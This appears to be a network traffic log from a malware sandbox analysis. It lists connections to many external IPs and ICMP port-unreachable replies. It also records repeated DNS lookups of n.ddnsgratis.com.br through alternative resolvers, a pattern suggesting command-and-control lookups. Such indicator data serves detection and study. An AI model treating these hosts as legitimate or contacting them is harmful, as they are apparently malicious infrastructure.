                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.044723988 CEST5018353192.168.2.9185.14.29.140
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.068959951 CEST5542153192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.084881067 CEST53554211.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.086344004 CEST5662853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.121176958 CEST53566281.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.144649029 CEST5724753192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.259047985 CEST572486420192.168.2.9183.82.146.144
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.828723907 CEST572496832192.168.2.9187.13.131.28
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:08.158703089 CEST5724753192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:08.317612886 CEST572507374192.168.2.9211.107.173.111
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:09.245842934 CEST5724753192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:11.301722050 CEST5724753192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:15.325527906 CEST5724753192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:18.637722969 CEST572516373192.168.2.992.241.90.238
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:19.379733086 CEST5640553192.168.2.91.1.1.1
Timestamp                             SrcPort DstPort Source IP        Dest IP
Oct 18, 2024 12:44:19.443394899 CEST  53      56405   1.1.1.1          192.168.2.9
Oct 18, 2024 12:44:19.444880962 CEST  64353   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:44:19.460015059 CEST  53      64353   1.1.1.1          192.168.2.9
Oct 18, 2024 12:44:19.461707115 CEST  64123   53      192.168.2.9      37.187.0.40
Oct 18, 2024 12:44:19.503982067 CEST  64124   4823    192.168.2.9      188.26.1.21
Oct 18, 2024 12:44:20.335758924 CEST  64125   4770    192.168.2.9      109.124.19.10
Oct 18, 2024 12:44:20.505163908 CEST  64123   53      192.168.2.9      37.187.0.40
Oct 18, 2024 12:44:21.641191006 CEST  64123   53      192.168.2.9      37.187.0.40
Oct 18, 2024 12:44:21.646155119 CEST  64126   7119    192.168.2.9      217.219.117.8
Oct 18, 2024 12:44:22.084018946 CEST  64127   4343    192.168.2.9      84.22.25.227
Oct 18, 2024 12:44:22.607924938 CEST  64128   8260    192.168.2.9      27.3.6.5
Oct 18, 2024 12:44:23.189407110 CEST  64129   5372    192.168.2.9      201.58.235.159
Oct 18, 2024 12:44:23.709696054 CEST  64123   53      192.168.2.9      37.187.0.40
Oct 18, 2024 12:44:23.796590090 CEST  64130   5130    192.168.2.9      183.82.176.250
Oct 18, 2024 12:44:27.743957043 CEST  64123   53      192.168.2.9      37.187.0.40
Oct 18, 2024 12:44:31.895919085 CEST  63157   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:44:32.029779911 CEST  63157   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:44:32.831510067 CEST  53      63157   1.1.1.1          192.168.2.9
Oct 18, 2024 12:44:32.831521034 CEST  53      63157   1.1.1.1          192.168.2.9
Oct 18, 2024 12:44:32.834800959 CEST  59471   53      192.168.2.9      128.199.248.105
Oct 18, 2024 12:44:33.107023001 CEST  59471   53      192.168.2.9      128.199.248.105
Oct 18, 2024 12:44:33.409229040 CEST  59471   53      192.168.2.9      128.199.248.105
Oct 18, 2024 12:44:33.878577948 CEST  59471   53      192.168.2.9      128.199.248.105
Oct 18, 2024 12:44:33.880516052 CEST  59472   5734    192.168.2.9      14.96.209.63
Oct 18, 2024 12:44:34.189891100 CEST  59471   53      192.168.2.9      128.199.248.105
Oct 18, 2024 12:44:34.459676981 CEST  62736   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:44:34.470710993 CEST  53      62736   1.1.1.1          192.168.2.9
Oct 18, 2024 12:44:34.472408056 CEST  62136   53      192.168.2.9      95.85.9.86
Oct 18, 2024 12:44:34.940681934 CEST  62137   4441    192.168.2.9      93.94.54.35
Oct 18, 2024 12:44:35.591125011 CEST  62136   53      192.168.2.9      95.85.9.86
Oct 18, 2024 12:44:35.647361040 CEST  62138   7119    192.168.2.9      189.12.181.188
Oct 18, 2024 12:44:36.629070997 CEST  62136   53      192.168.2.9      95.85.9.86
Oct 18, 2024 12:44:36.961955070 CEST  62139   8030    192.168.2.9      193.140.107.175
Oct 18, 2024 12:44:37.489021063 CEST  62140   5684    192.168.2.9      89.34.124.109
Oct 18, 2024 12:44:38.561111927 CEST  62141   5127    192.168.2.9      196.200.62.20
Oct 18, 2024 12:44:38.738105059 CEST  62136   53      192.168.2.9      95.85.9.86
Oct 18, 2024 12:44:38.972367048 CEST  62142   4579    192.168.2.9      123.237.94.47
Oct 18, 2024 12:44:39.504286051 CEST  62143   6389    192.168.2.9      178.22.169.142
Oct 18, 2024 12:44:42.770468950 CEST  62136   53      192.168.2.9      95.85.9.86
Oct 18, 2024 12:44:46.838177919 CEST  54338   53      192.168.2.9      8.8.8.8
Oct 18, 2024 12:44:46.845820904 CEST  53      54338   8.8.8.8          192.168.2.9
Oct 18, 2024 12:44:49.005934954 CEST  54339   7046    192.168.2.9      203.122.23.55
Oct 18, 2024 12:44:50.132889986 CEST  54340   5460    192.168.2.9      89.32.53.124
Oct 18, 2024 12:44:50.957659960 CEST  54341   6554    192.168.2.9      58.147.170.86
Oct 18, 2024 12:44:52.070143938 CEST  54342   6621    192.168.2.9      196.20.112.81
Oct 18, 2024 12:44:52.566507101 CEST  54343   6500    192.168.2.9      123.237.93.73
Oct 18, 2024 12:44:53.615158081 CEST  54344   5295    192.168.2.9      27.2.3.124
Oct 18, 2024 12:44:53.617563009 CEST  53905   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:44:53.628532887 CEST  53      53905   1.1.1.1          192.168.2.9
Oct 18, 2024 12:44:53.629956961 CEST  58864   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:44:53.653831005 CEST  53      58864   1.1.1.1          192.168.2.9
Oct 18, 2024 12:44:53.661932945 CEST  49191   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:44:53.703104973 CEST  53      49191   1.1.1.1          192.168.2.9
Oct 18, 2024 12:44:53.704653978 CEST  55877   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:44:53.714534044 CEST  53      55877   1.1.1.1          192.168.2.9
Oct 18, 2024 12:44:53.716046095 CEST  65505   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:44:53.727310896 CEST  53      65505   1.1.1.1          192.168.2.9
Oct 18, 2024 12:44:53.746553898 CEST  52335   53      192.168.2.9      178.17.170.133
Oct 18, 2024 12:44:53.815402031 CEST  52335   53      192.168.2.9      178.17.170.133
Oct 18, 2024 12:44:53.862550020 CEST  52335   53      192.168.2.9      178.17.170.133
Oct 18, 2024 12:44:53.910829067 CEST  52335   53      192.168.2.9      178.17.170.133
Oct 18, 2024 12:44:53.957437038 CEST  52335   53      192.168.2.9      178.17.170.133
Oct 18, 2024 12:44:54.004734039 CEST  59201   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:44:54.016729116 CEST  53      59201   1.1.1.1          192.168.2.9
Oct 18, 2024 12:44:54.018744946 CEST  55360   53      192.168.2.9      185.14.29.140
Oct 18, 2024 12:44:54.044097900 CEST  55360   53      192.168.2.9      185.14.29.140
Oct 18, 2024 12:44:54.081768990 CEST  55360   53      192.168.2.9      185.14.29.140
Oct 18, 2024 12:44:54.161009073 CEST  55360   53      192.168.2.9      185.14.29.140
Oct 18, 2024 12:44:54.207047939 CEST  55361   6455    192.168.2.9      196.200.62.30
Oct 18, 2024 12:44:54.207907915 CEST  55360   53      192.168.2.9      185.14.29.140
Oct 18, 2024 12:44:54.248543024 CEST  64863   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:44:54.261307001 CEST  53      64863   1.1.1.1          192.168.2.9
Oct 18, 2024 12:44:54.263775110 CEST  59237   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:44:54.347028971 CEST  59237   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:44:54.400557041 CEST  53      59237   1.1.1.1          192.168.2.9
Oct 18, 2024 12:44:54.400573969 CEST  53      59237   1.1.1.1          192.168.2.9
Oct 18, 2024 12:44:54.415359020 CEST  58544   53      192.168.2.9      178.63.145.236
Oct 18, 2024 12:44:54.676359892 CEST  58545   5127    192.168.2.9      124.125.109.155
Oct 18, 2024 12:44:55.430516958 CEST  58544   53      192.168.2.9      178.63.145.236
Oct 18, 2024 12:44:56.440752983 CEST  58544   53      192.168.2.9      178.63.145.236
Oct 18, 2024 12:44:58.444480896 CEST  58544   53      192.168.2.9      178.63.145.236
Oct 18, 2024 12:45:02.474888086 CEST  58544   53      192.168.2.9      178.63.145.236
Oct 18, 2024 12:45:04.130321026 CEST  58546   4900    192.168.2.9      58.72.195.130
Oct 18, 2024 12:45:05.166522980 CEST  58547   8100    192.168.2.9      151.56.26.254
Oct 18, 2024 12:45:06.050421953 CEST  58548   5446    192.168.2.9      41.250.185.19
Oct 18, 2024 12:45:06.504868984 CEST  58348   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:45:06.596029043 CEST  58348   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:45:06.602900982 CEST  53      58348   1.1.1.1          192.168.2.9
Oct 18, 2024 12:45:06.604376078 CEST  51747   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:45:06.606148005 CEST  53      58348   1.1.1.1          192.168.2.9
Oct 18, 2024 12:45:06.613405943 CEST  53      51747   1.1.1.1          192.168.2.9
Oct 18, 2024 12:45:06.614948988 CEST  55614   53      192.168.2.9      37.187.0.40
Oct 18, 2024 12:45:07.098982096 CEST  55615   6219    192.168.2.9      178.123.176.220
Oct 18, 2024 12:45:07.635962963 CEST  55614   53      192.168.2.9      37.187.0.40
Oct 18, 2024 12:45:07.660871029 CEST  55616   8804    192.168.2.9      31.140.4.130
Oct 18, 2024 12:45:08.643780947 CEST  55614   53      192.168.2.9      37.187.0.40
Oct 18, 2024 12:45:08.757560968 CEST  55617   5204    192.168.2.9      93.113.189.169
Oct 18, 2024 12:45:09.316910982 CEST  55618   6195    192.168.2.9      81.90.238.197
Oct 18, 2024 12:45:09.817137957 CEST  55619   5820    192.168.2.9      212.150.50.138
Oct 18, 2024 12:45:10.658979893 CEST  55614   53      192.168.2.9      37.187.0.40
Oct 18, 2024 12:45:14.840624094 CEST  55614   53      192.168.2.9      37.187.0.40
Oct 18, 2024 12:45:18.911434889 CEST  49957   53      192.168.2.9      1.1.1.1
Oct 18, 2024 12:45:18.940473080 CEST  53      49957   1.1.1.1          192.168.2.9
Oct 18, 2024 12:45:18.941973925 CEST  54923   53      192.168.2.9      128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.252859116 CEST5492353192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.335988045 CEST549246130192.168.2.989.179.33.87
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.550877094 CEST5492353192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.875459909 CEST5492353192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.206214905 CEST5492353192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.472237110 CEST549255285192.168.2.9200.241.176.189
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.525527954 CEST6390853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.611905098 CEST6390853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.620299101 CEST53639081.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.621762037 CEST5767953192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.663866043 CEST53639081.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:21.224270105 CEST576806840192.168.2.941.251.18.107
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:21.644077063 CEST5767953192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.347749949 CEST5768140036192.168.2.978.106.189.148
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.660218000 CEST5767953192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.894309998 CEST576827617192.168.2.9188.72.28.186
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:24.019355059 CEST576834783192.168.2.959.99.50.127
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:24.542260885 CEST576844510192.168.2.9125.160.141.184
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:24.776211023 CEST5767953192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:25.082176924 CEST576855549192.168.2.985.186.185.172
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.944122076 CEST5767953192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:32.989737034 CEST5234453192.168.2.98.8.8.8
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.002341986 CEST53523448.8.8.8192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:34.509999037 CEST523457368192.168.2.993.81.148.235
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:35.645075083 CEST523466028192.168.2.978.97.126.19
Timestamp                              Source IP        Dest IP        Checksum  Code                Type
Oct 18, 2024 12:41:46.041647911 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:41:46.126673937 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:41:46.235614061 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:41:46.286914110 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:41:46.356934071 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:41:46.429220915 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:41:46.567645073 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:41:46.671700001 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:41:46.815556049 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:41:46.847861052 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:11.695054054 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:11.961205006 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:12.259316921 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:12.540050983 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:12.806139946 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:32.983635902 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:33.035825968 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:33.089720011 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:33.152163982 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:33.192622900 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:33.239440918 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:33.284415007 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:33.333213091 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:33.359558105 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:33.380587101 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:59.241276979 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:59.555743933 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:42:59.833636999 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:00.114622116 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:00.425853968 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:19.323936939 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:19.391571999 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:19.437021017 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:19.481340885 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:19.560447931 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:19.590603113 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:19.610661030 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:19.632257938 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:19.651472092 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:19.675209999 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:44.958175898 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:45.271939993 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:45.549484015 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:45.831425905 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:43:46.656413078 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:06.374625921 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:06.461400032 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:06.806920052 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:06.850286007 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:06.890846014 CEST   178.17.170.133   192.168.2.9    1c84      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:06.923554897 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:06.943790913 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:07.008116007 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:07.043102026 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:07.066385984 CEST   185.14.29.140    192.168.2.9    9687      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:33.099389076 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:33.372102976 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:33.837534904 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:34.143100023 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
Oct 18, 2024 12:44:34.454691887 CEST   128.199.248.105  192.168.2.9    391e      (Port unreachable)  Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.787282944 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.856017113 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.903150082 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.951997995 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.998128891 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.036214113 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.061536074 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.099169970 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.178461075 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.225446939 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.209472895 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.546246052 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.846641064 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.144072056 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.476675034 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.426521063 CEST192.168.2.9178.63.145.2360x395cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:34.470748901 CEST192.168.2.9178.63.145.2360x395cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:35.728871107 CEST192.168.2.9178.63.145.2360x395cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:37.736524105 CEST192.168.2.9178.63.145.2360x395cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:41.770945072 CEST192.168.2.9178.63.145.2360x395cStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:45.832501888 CEST192.168.2.91.1.1.10x9cf6Standard query (0)civet.ziphaze.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:46.041745901 CEST192.168.2.91.1.1.10xeb38Standard query (0)ns2.fr.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:46.805542946 CEST192.168.2.937.187.0.400xfdb4Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:47.821424007 CEST192.168.2.937.187.0.400xfdb4Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.847404003 CEST192.168.2.937.187.0.400xfdb4Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:50.892198086 CEST192.168.2.937.187.0.400xfdb4Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.928977966 CEST192.168.2.937.187.0.400xfdb4Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:58.955209017 CEST192.168.2.91.1.1.10xd247Standard query (0)ns1.sg.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:58.970484018 CEST192.168.2.9128.199.248.1050x40f7Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:59.275609016 CEST192.168.2.9128.199.248.1050x40f7Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:59.566191912 CEST192.168.2.9128.199.248.1050x40f7Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:59.846750975 CEST192.168.2.9128.199.248.1050x40f7Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.142465115 CEST192.168.2.9128.199.248.1050x40f7Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.427730083 CEST192.168.2.91.1.1.10x78ecStandard query (0)ns1.nl.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.445039988 CEST192.168.2.995.85.9.860xad8fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.460053921 CEST192.168.2.995.85.9.860xad8fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:02.537067890 CEST192.168.2.995.85.9.860xad8fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:04.576143026 CEST192.168.2.995.85.9.860xad8fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:08.596256018 CEST192.168.2.995.85.9.860xad8fStandard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.645678997 CEST192.168.2.98.8.8.80xf4a8Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.028672934 CEST192.168.2.91.1.1.10x152Standard query (0)ns.dotbit.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.042274952 CEST192.168.2.91.1.1.10x8f39Standard query (0)alors.deepdns.cryptostorm.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.204072952 CEST192.168.2.91.1.1.10xb0bbStandard query (0)onyx.deepdns.cryptostorm.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.243251085 CEST192.168.2.91.1.1.10xe514Standard query (0)ns1.any.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.258398056 CEST192.168.2.91.1.1.10x389cStandard query (0)ns1.random.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.280816078 CEST192.168.2.9178.17.170.1330x1c31Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.348555088 CEST192.168.2.9178.17.170.1330x1c31Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
